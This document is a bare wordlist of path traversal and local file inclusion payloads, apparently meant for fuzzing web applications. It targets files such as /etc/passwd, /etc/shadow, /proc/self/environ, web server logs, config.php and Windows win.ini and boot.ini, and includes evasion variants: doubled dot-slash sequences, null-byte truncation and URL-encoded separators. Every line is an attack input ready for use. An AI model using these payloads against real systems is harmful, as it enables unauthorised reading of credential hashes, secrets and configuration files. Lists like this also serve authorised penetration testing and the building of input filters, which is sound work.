../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../etc/shadow
../../../../etc/shadow
../../../../../etc/shadow
../../../etc/group
../../../../etc/group
../../../etc/hosts
../../../../etc/hosts
../../../etc/issue
../../../../etc/issue
../../../etc/hostname
../../../../etc/hostname
../../../proc/self/environ
../../../../proc/self/environ
../../../proc/version
../../../../proc/version
../../../proc/cmdline
../../../../proc/cmdline
..\..\..\..\windows\win.ini
..\..\..\..\..\windows\win.ini
..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\boot.ini
..\..\..\..\..\boot.ini
..\..\..\..\windows\system.ini
..\..\..\..\..\windows\system.ini
..\..\..\..\windows\php.ini
..\..\..\..\..\windows\php.ini
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/issue
/etc/hostname
/proc/self/environ
/proc/version
/proc/cmdline
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/www/html/index.php
/var/www/html/config.php
C:\windows\win.ini
C:\windows\system.ini
C:\windows\system32\drivers\etc\hosts
C:\boot.ini
....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
..../..../..../etc/passwd
..../..../..../..../etc/passwd
....\....\....\windows\win.ini
....\....\....\....\windows\win.ini
/etc/passwd%00
/etc/passwd%00.jpg
../../../etc/passwd%00
../../../etc/passwd%00.jpg
....//....//....//etc/passwd%00
..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5c..%5c..%5cwindows%5cwin.ini
..%5c..%5c..%5c..%5cwindows%5cwin.ini
